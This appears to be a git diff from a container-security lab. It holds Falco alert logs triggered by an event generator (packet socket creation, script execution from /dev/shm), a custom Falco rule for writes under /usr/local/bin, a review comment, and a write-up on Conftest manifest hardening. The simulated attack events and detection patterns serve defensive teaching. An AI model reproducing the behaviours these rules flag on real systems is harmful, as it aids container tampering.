k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.args":"fd=6() domain=17(AF_PACKET) type=3 proto=3","evt.time.iso8601":1762539428378788643,"evt.type":"socket","fd.l4proto":"","fd.lport":null,"fd.name":"","fd.rport":null,"fd.type":"","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"event-generator run syscall","proc.exepath":"/bin/event-generator","proc.name":"event-generator","proc.pname":"containerd-shim","proc.tty":0,"user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Notice","rule":"Packet socket created in container","source":"syscall","tags":["T1557.002","container","maturity_stable","mitre_credential_access","network"],"time":"2025-11-07T18:17:08.378788643Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.483695518+0000: Warning File execution detected from /dev/shm | evt_res=SUCCESS file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"SUCCESS","evt.time.iso8601":1762539428483695518,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run 
syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-11-07T18:17:08.483695518Z"} +{"hostname":"5238b209792c","output":"2025-11-07T18:17:08.483991726+0000: Warning File execution detected from /dev/shm | evt_res=EACCES file= proc_cwd=/ proc_pcmdline=event-generator run syscall user_loginname= group_gid=0 group_name=root evt_type=execve user=root user_uid=0 user_loginuid=-1 process=sh proc_exepath=/bin/busybox parent=event-generator command=sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh terminal=0 exe_flags=EXE_WRITABLE|EXE_LOWER_LAYER container_id=f66ca4123505 container_name= container_image_repository= container_image_tag= k8s_pod_name= k8s_ns_name=","output_fields":{"container.id":"f66ca4123505","container.image.repository":null,"container.image.tag":null,"container.name":null,"evt.arg.flags":"EXE_WRITABLE|EXE_LOWER_LAYER","evt.res":"EACCES","evt.time.iso8601":1762539428483991726,"evt.type":"execve","fd.name":null,"group.gid":0,"group.name":"root","k8s.ns.name":null,"k8s.pod.name":null,"proc.cmdline":"sh -c /dev/shm/falco-event-generator-syscall-ExecutionFromDevShm-1zRpmX.sh","proc.cwd":"/","proc.exepath":"/bin/busybox","proc.name":"sh","proc.pcmdline":"event-generator run syscall","proc.pname":"event-generator","proc.tty":0,"user.loginname":"","user.loginuid":-1,"user.name":"root","user.uid":0},"priority":"Warning","rule":"Execution from /dev/shm","source":"syscall","tags":["T1059.004","container","host","maturity_stable","mitre_execution"],"time":"2025-11-07T18:17:08.483991726Z"} diff --git a/labs/lab9/falco/rules/custom-rules.yaml b/labs/lab9/falco/rules/custom-rules.yaml new file mode 100644 index 00000000..9ac72e49 --- /dev/null +++ b/labs/lab9/falco/rules/custom-rules.yaml 
@@ -0,0 +1,11 @@
+# Detect new writable file under /usr/local/bin inside any container
+- rule: Write Binary Under UsrLocalBin
+ desc: Detects writes under /usr/local/bin inside any container
+ condition: evt.type in (open, openat, openat2, creat) and
+ evt.is_open_write=true and
+ fd.name startswith /usr/local/bin/ and
+ container.id != host
+ output: >
+ Falco Custom: File write in /usr/local/bin (container=%container.name user=%user.name file=%fd.name flags=%evt.arg.flags)
+ priority: WARNING
+ tags: [container, compliance, drift]
diff --git a/labs/submission9.md b/labs/submission9.md
new file mode 100644
index 00000000..cec69acf
--- /dev/null
+++ b/labs/submission9.md
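Review bot: The condition has no success filter, so an open that the kernel rejects can still fire: `evt.is_open_write=true` only inspects the requested flags, and the page's own falco.log shows how denied attempts surface (`evt_res=EACCES` on the /dev/shm execve). The stock `open_write` macro adds `fd.num>=0` for exactly this reason, so `container.id != host and fd.num>=0` (optionally with `evt.dir=<` to match only the exit event) keeps a drift alert to writes that actually landed; denied attempts can be a separate, lower-priority rule rather than being mixed into the same signal. The output template leans on `%container.name`, which the captured log leaves empty (`container_name=`), so add `%container.id` and `%proc.cmdline` to the output line so a fired alert can be traced to a process. Finally the `rule:` name here is `Write Binary Under UsrLocalBin` while submission9.md documents it as `Binary W Under UsrLocalBin`; the two should agree so operators can search for the rule by name.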
@@ -0,0 +1,58 @@
+# Lab 9
+
+## Task 1
+
+### Evidence (baseline alerts observed)
+- Falco observed an interactive shell opened inside the helper container (attached terminal).
+- Falco raised a custom WARNING when a process in `lab9-helper` wrote to `/usr/local/bin/drift.txt`.
+- A second WARNING recorded a validation write to `/usr/local/bin/custom-rule.txt` (both writes show FD_UPPER_LAYER).
+
+### Custom rule purpose
+- Rule: Binary W Under UsrLocalBin
+- Purpose: detect creation or modification of files under `/usr/local/bin` inside containers — a common indicator of post-deployment tampering or container drift.
+
+### When the rule should fire
+- When any container process opens/creates a file for write under `/usr/local/bin/` (open/openat/openat2/creat with write flags).
+
+### When the rule should NOT fire (tuning guidance)
+- Exclude trusted build or management containers (by `container.image.repository` or `container.name`).
+- Optionally ignore package-manager writes or root-owned maintenance processes, or lower severity/rate-limit alerts to reduce noise.
+
+### Quick operational notes
+- Falco reloads rules from `/etc/falco/rules.d`; if a reload is needed, send SIGHUP to the Falco container.
+- Validation steps used: start helper (alpine), spawn shell, perform test writes to `/usr/local/bin` and confirm rule alerts.
+
+### Minimal next steps / recommendations
+- Add allowlists for known builders and legitimate images to reduce false positives.
+- Map the rule to alerting channels and set an appropriate severity.
+
+## Task 2: Policy-as-Code with Conftest (Rego)
+
+### Policy violations from unhardened manifest
+The unhardened manifest fails several critical checks that weaken runtime security:
+1. `:latest` image tag — unpinned images are unpredictable and hinder reproducible, auditable deployments.
+2. Missing `runAsNonRoot: true` — runs as root, increasing risk of privilege escalation and host compromise.
+3. Missing `allowPrivilegeEscalation: false` — allows child processes to gain privileges beyond the parent.
+4. Missing `readOnlyRootFilesystem: true` — writable root enables tampering and persistence by attackers.
+5. No capability drops — retains unnecessary Linux capabilities that enlarge attack surface.
+6. Missing CPU requests/limits — permits CPU exhaustion and noisy-neighbor denial-of-service.
+7. Missing memory requests/limits — risk of OOM and node instability.
+8. (Warn) Missing readiness/liveness probes — reduces ability to detect and recover unhealthy pods.
+
+### The specific hardening changes in the hardened manifest
+The hardened manifest addresses the failures with these concrete changes:
+- Image pinning: `bkimminich/juice-shop:v19.0.0` (replaces `:latest`).
+- SecurityContext:
+ - `runAsNonRoot: true` (avoid root execution)
+ - `allowPrivilegeEscalation: false` (prevent privilege gains)
+ - `readOnlyRootFilesystem: true` (limit writable surface)
+ - `capabilities.drop: ["ALL"]` (remove extra capabilities)
+- Resource limits/requests set for CPU and memory (prevents resource exhaustion and noisy neighbors).
+- Readiness and liveness probes added (improves availability and automated recovery).
+
+These changes directly satisfy the conftest rules by removing root execution, limiting privileges, pinning images, and enforcing resource and availability controls.
+
+### Analysis of the Docker Compose manifest results
+- `conftest-compose.txt` shows all 15 compose checks passed with no denies.
+- The compose policy requires non-root user, read-only root filesystem, and `cap_drop: ["ALL"]`; the manifest meets these requirements.
+- Recommendation: add `no-new-privileges` and maintain image pinning and resource constraints in compose files where supported.